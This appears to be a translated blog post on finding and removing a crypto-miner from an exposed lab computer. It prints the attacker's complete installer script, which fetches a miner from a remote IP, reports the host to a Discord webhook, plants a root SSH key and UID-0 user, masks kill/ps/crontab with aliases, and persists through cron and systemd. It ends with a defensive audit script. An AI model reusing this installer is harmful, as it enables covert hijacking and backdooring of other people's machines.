Notes on a crypto-miner intrusion and its cleanup
To make remote access more convenient, a junior labmate mapped the lab computer onto the public internet, and as a result a crypto-mining program was planted on it.
The mining software was this one (see the screenshot). Since it has already been cleaned up, it can no longer be seen running; otherwise the nvidia-smi command would show the miner process at work.
Then go into that process's entry under /proc with cd /proc/$PID and look at its information.
First list all the files; you can see where the mining program has been placed.
cat status shows the process information.
The PPID field identifies the parent process. Here I am reproducing the incident, so the parent process is 4168; originally the parent process was 2.
I then killed the parent process and the mining process itself. But after a while the miner reappeared, which suggested a scheduled task, and rebooting did not help either.
First, check whether the boot-time startup script is normal:
vim /etc/rc.local
This file was normal, so that is not where it was placed.
Next, check the root account's .bashrc file:
vim ~/.bashrc
It contained only a few lines, and one of them clearly neutralises the delete command. After switching to the root account I found that many commands had been masked, so something was definitely wrong, but this file itself does not run the miner. Thinking of scheduled tasks, I checked whether a crontab had been set up:
ps -aux | grep crontab
Sure enough, a scheduled task existed, so I looked at the cron entries:
crontab -e
These odd tasks could be seen; I commented them out here.
Then I went to /var/tmp/.tmp/ to look at the files there. The first is the miner launcher, and the second is the installer script that sets everything up:
```bash
#!/bin/bash
m1lbe1() {
  if ! pgrep -x PhoenixMiner >/dev/null
  then
    cd /var/tmp/.tmp/PhoenixMiner
    ./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
  else
    exit;
  fi
}
m1lbe1
```
```bash
#!/bin/bash
###Date###
user="sclipicibosu"
pass="saieilamuie"
gilimea='"'
ip=`/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me`
rm -rf *timeout
sshkey="ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAplmD9EFVf28OUB8tK/qJYG4ggMAw9PJzJU1AONgB5FV9w1hxxmP/+vVUfj7HgaTPB94IW4svaMe3vMTkmYm/0y9Zrh8Q2r6f/r1OqpwQU3ThLR6quOAtl7TW7y4VIQ/wxXOffINAIrEv7mi8D0XgpkiFwIUoblZY0ErPjBwy0WFqua2Z0qxx1bHoznDxPOsHMRxSge4DYA0gADttEWz8x1NZFcjMql8OOQ5IpZRsHxlO4cBVG37WyYpL7NYGF0gqnRRFSXBGduQph1dsEf3KFo83/QaSg+mm+EQiFrbVeqpm9tDjiFazbrwsw0YhT47yzKPi+Tews16sIHAvs5KZkw== sclipicibosu"
nenea=`whoami`
uptime=$(</proc/uptime)
uptime=${uptime%%.*}
zile=$(( uptime/60/60/24 ))
secunde=$(( uptime%60 ))
minute=$(( uptime/60%60 ))
ore=$(( uptime/60/60%24 ))
sended=$(date +'%m/%d/%Y')
url='https://discord.com/api/webhooks/821345448212037685/UIO1CteG8cl6DerrO6fbI0ldKGk90H36NeNpXH56aYNbCBd1UZ31J89CR5ZBRSd9c3xj'
##########
getingmineru(){
  locatie="$(cat /var/tmp/.ladyg0g0/.pr1nc35)"
  if [ -f $locatie/PhoenixMiner ]; then
    :
  else
    curl -s -L -O 45.32.112.68/.mini/PhoenixMiner.tar
    tar xvf PhoenixMiner.tar
    chmod 777 PhoenixMiner/*
  fi
}
###
locationperfection(){
  tinlex=$(pwd)
  mkdir /var/tmp/.ladyg0g0/ >/dev/null 2>&1
  echo $tinlex > "/var/tmp/.ladyg0g0/.pr1nc35"
  if [ $(id -u) = 0 ]; then
    if [ -f "/usr/bin/.locationesclipiciu" ]; then
      :
    else
      echo $tinlex > "/usr/bin/.locationesclipiciu"
    fi
  fi
}
###
showproof(){
  echo ' { "content": null, "embeds": [ { "title": "Miner ON: Ip: '$ip' | Pe User: '$nenea' ", "description": "**Cand s-a facut Install-ul:** ***'$sended'***\n\n**Other Info:** ***Version: 3.0*** **| Uptime Miner:** ***'$zile'*** **Zile**", "color": 16711680 } ] }' > /tmp/.send.json
  /usr/bin/curl -H "Content-Type: application/json" --data @/tmp/.send.json $url
}
###
sshkiller(){
  if [ $(id -u) = 0 ]; then
    mkdir /usr/.SQL-Unix
    mkdir /usr/.SQL-Unix/.SQL
    echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
' > ~/.bashrc
" > /usr/.SQL-Unix/.SQL/.db
    echo "# .bashrc
source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
" > ~/.bashrc
    echo "
if [ -f ~/.bashrc ]; then
  . ~/.bashrc
fi
" > ~/.bash_profile
    chattr -i /root/.ssh ; chattr -i /root/.ssh/authorized_keys
    echo $sshkey > "/root/.ssh/authorized_keys"
    chmod 600 /root/.ssh/authorized_keys
    chattr +i /root/.ssh/authorized_keys
  else
    mkdir /var/tmp/.SQL-Unix > /dev/null 2>&1
    mkdir /var/tmp/.SQL-Unix/.SQL > /dev/null 2>&1
    echo "# .bashrc
############
rm -rf ~/.bashrc
rm -rf ~/.bash_history
alias pkill='printf $gilimea$gilimea'
alias kill='printf $gilimea$gilimea'
alias killall='printf $gilimea$gilimea'
alias init='printf $gilimea$gilimea'
alias rm='printf $gilimea$gilimea'
alias halt='printf $gilimea$gilimea'
alias adduser='printf $gilimea$gilimea'
alias userdel='printf $gilimea$gilimea'
alias crontab='printf $gilimea$gilimea'
alias htop='printf $gilimea$gilimea'
alias find='printf $gilimea$gilimea'
alias locate='printf $gilimea$gilimea'
alias ps='printf $gilimea$gilimea'
alias ss='printf $gilimea$gilimea'
alias netstat='printf $gilimea$gilimea'
############
echo '# .bashrc
source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
' > ~/.bashrc
" > /var/tmp/.SQL-Unix/.SQL/.db
    echo "# .bashrc
source /var/tmp/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
echo Uname: $(uname -a)
" > ~/.bashrc
    echo "
if [ -f ~/.bashrc ]; then
  . ~/.bashrc
fi
" > ~/.bash_profile
  fi
}
###
facuser(){
  if [ $(id -u) = 0 ]; then
    if ! cat /etc/passwd | grep -q "${user}"; then
      /usr/sbin/useradd -u0 -g0 -o -s /bin/bash $user ; usermod -aG sudo $user
      yes "$pass" | passwd $user
    else
      :
    fi
  fi
}
###
minerinio(){
  locatie="$(pwd)"
  if [ -f $locatie/.b4nd1d0 ]
  then
    locatie="$(pwd)"
    echo '#!/bin/bash
m1lbe1() {
if ! pgrep -x PhoenixMiner >/dev/null
then
cd '$locatie'/PhoenixMiner
./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
    chmod 777 $locatie/.b4nd1d0
    $locatie/./.b4nd1d0
  else
    locatie="$(pwd)"
    echo '#!/bin/bash
m1lbe1() {
if ! pgrep -x PhoenixMiner >/dev/null
then
cd '$locatie'/PhoenixMiner
./PhoenixMiner -pool ssl://eth-asia1.nanopool.org:9433 -wal 0xd281ffdd4fb30987b7fe4f8721b022f4b4ffc9f8.sclipiciNR1/sclipicinr1@gmail.com >/dev/null 2>&1 & disown $*
else
exit;
fi
}
m1lbe1' > $locatie/.b4nd1d0
    chmod 777 $locatie/.b4nd1d0
    $locatie/./.b4nd1d0
  fi
}
###
crontablegend() {
  locatie="$(pwd)"
  if ! crontab -l | grep -q '.placi'; then
    rm -rf $locatie/.5p4rk3l5
    echo "@daily "$locatie"/./.b4nd1d0" >> $locatie/.5p4rk3l5
    sleep 1
    echo "@reboot "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
    sleep 1
    echo "* * * * * "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
    sleep 1
    echo "@monthly "$locatie"/./.placi > /dev/null 2>&1 & disown" >> $locatie/.5p4rk3l5
    sleep 1
    crontab $locatie/.5p4rk3l5
    sleep 1
    source ~/.bashrc
    rm -rf $locatie/.5p4rk3l5
  fi
}
###
locationperfection
sleep 0.5
echo "Locatie ON"
wait
getingmineru
sleep 0.5
echo "Minerul Luat"
wait
facuser
sleep 0.5
echo "User Facut"
wait
sshkiller
sleep 0.5
echo "SSH Mort"
wait
showproof
sleep 0.5
echo "Info Trimis"
wait
crontablegend
sleep 0.5
echo "Crontab Done"
wait
minerinio
sleep 0.5
echo "Minerul Pornit"
wait
###
checkingpid(){
  if [ -f /usr/bin/.pidsclip ]; then
    if ps -p $(cat /usr/bin/.pidsclip) > /dev/null; then
      echo "Already running..."
    else
      /usr/bin/sshd > /dev/null 2>&1 & disown
      echo $! > /usr/bin/.pidsclip
      chmod 777 /usr/bin/.pidsclip
      echo "Done"
    fi
  else
    /usr/bin/sshd > /dev/null 2>&1 & disown
    echo $! > /usr/bin/.pidsclip
    chmod 777 /usr/bin/.pidsclip
    echo "Done"
  fi
}
###
killingstrangers(){
  echo '
#!/bin/bash
locatieasdf=$(cat /usr/bin/.locationesclipiciu)
if [ ! -d '$locatieasdf' ]; then
mkdir '$locatieasdf'
rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
sleep 1
'$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
else
if [ ! -f '$locatieasdf'/PhoenixMiner ]; then
rsync -r /usr/bin/.locationesclipiciu/ '$locatieasdf'/
sleep 1
'$locatieasdf'/.b4nd1d0 > /dev/null 2>&1 & disown
fi' > /usr/bin/sshd
  sleep 1
  chmod 777 /usr/bin/sshd
}
###
pisamsystemu(){
  echo '[Unit]
Description=Example systemd service.
[Service]
Type=simple
Restart=always
RestartSec=3600
ExecStart=/bin/bash /usr/bin/sshd
[Install]
WantedBy=multi-user.target' > /lib/systemd/system/myservice.service
  sleep 1
  chmod 644 /lib/systemd/system/myservice.service
  systemctl enable myservice
  systemctl start myservice
  if [ -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    echo "Locatia este deja setata"
  else
    if [ -f "/usr/bin/.locationesclipiciu" ]; then
      locationperfection
      echo "Am-rupt-locatiile-alea"
      sleep 1
    fi
  fi
  if [ ! -f "/var/tmp/.ladyg0g0/.pr1nc35" ]; then
    if [ -d "/var/tmp/.ladyg0g0" ]; then
      locationperfection
      locationperfection
      echo "Locatia a fost setata"
    else
      echo "Acum facem folderul"
      mkdir /var/tmp/.ladyg0g0/
      locationperfection
      locationperfection
      echo "Am setat locatia"
    fi
  fi
  if [ -f $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip ]; then
    if ps -p $(cat $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip) > /dev/null; then
      echo "Already running..."
    else
      $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
      echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
      chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
      echo "Done"
    fi
  else
    $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.placi > /dev/null 2>&1 & disown
    echo $! > $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    chmod 777 $(cat /var/tmp/.ladyg0g0/.pr1nc35)/.pidsclip
    echo "Done"
  fi
}
###
if [ $(id -u) = 0 ]; then
  if [ ! -d /usr/bin/.locationesclipiciu ]; then
    cp -avr $(cat /var/tmp/.ladyg0g0/.pr1nc35) /usr/bin/.locationesclipiciu >/dev/null 2>&1 & disown
    bash -c 'yum install -y rsync >/dev/null 2>&1 & disown' || bash -c 'apt install -y rsync >/dev/null 2>&1 & disown'
    if [ ! -f /usr/bin/sshd ]; then
      killingstrangers
      pisamsystemu
      checkingpid
    fi
  fi
fi
###
```
As you can see, this person really did do their work here, and the script rewrites the .bashrc file, which is why our earlier look did not reveal the problem directly. If it had backed up .bashrc first, run the payload, and then restored the backup, it would have been far more covert. Probably a beginner (though it still took me a long time to find this malware...).
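The installer above hides itself in three places that a plain read of .bashrc misses: a sourced file under a hidden directory, do-nothing printf aliases for kill/ps/crontab and friends, and cron entries pointing into /var/tmp/.tmp. The following audit script is an added example, not part of the original write-up; it runs over constructed sample text shaped like those artefacts and reports each of the three patterns.

```python
import re

# alias NAME='printf ""' (what the dropper writes once $gilimea expands): a do-nothing alias
NOOP_ALIAS = re.compile(r"""^\s*alias\s+([\w.-]+)=(['"])printf\s*(?:""|'')?\2\s*$""")
# "source FILE" or ". FILE" lines, whose target we then inspect
SOURCE_LINE = re.compile(r"^\s*(?:source|\.)\s+(\S+)")
# any path with a hidden directory component, e.g. /var/tmp/.tmp/ or /usr/.SQL-Unix/
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")

def audit_bashrc(text):
    """Return (masked_commands, suspicious_sources) found in a .bashrc-style file."""
    masked, sources = [], []
    for line in text.splitlines():
        m = NOOP_ALIAS.match(line)
        if m:
            masked.append(m.group(1))
            continue
        s = SOURCE_LINE.match(line)
        if s and HIDDEN_DIR.search(s.group(1)):
            sources.append(s.group(1))
    return masked, sources

def audit_crontab(text):
    """Return crontab lines whose command lives under a hidden directory."""
    hits = []
    for line in text.splitlines():
        if line.strip() and not line.lstrip().startswith("#") and HIDDEN_DIR.search(line):
            hits.append(line.strip())
    return hits

# Constructed samples shaped like the artefacts on this page (not copied from a live host).
SAMPLE_BASHRC = """# .bashrc
source /usr/.SQL-Unix/.SQL/.db
alias rm='rm -i'
alias cp='cp -i'
"""
SAMPLE_DB = """alias pkill='printf ""'
alias kill='printf ""'
alias ps='printf ""'
alias crontab='printf ""'
"""
SAMPLE_CRON = """@daily /var/tmp/.tmp/./.b4nd1d0
* * * * * /var/tmp/.tmp/./.placi > /dev/null 2>&1 & disown
0 3 * * * /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    print("bashrc:", audit_bashrc(SAMPLE_BASHRC))
    print("sourced file:", audit_bashrc(SAMPLE_DB))
    print("crontab:", audit_crontab(SAMPLE_CRON))
```

On a real host, feed it the output of crontab -l for every account and the contents of each user's .bashrc and .bash_profile plus any file they source; the `source` hit is what leads from the innocuous-looking .bashrc to the alias file.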
With that, the mining malware was cleaned up, and I was scared enough to shut off the internal-network port mapping right away. Some people really will do anything for money...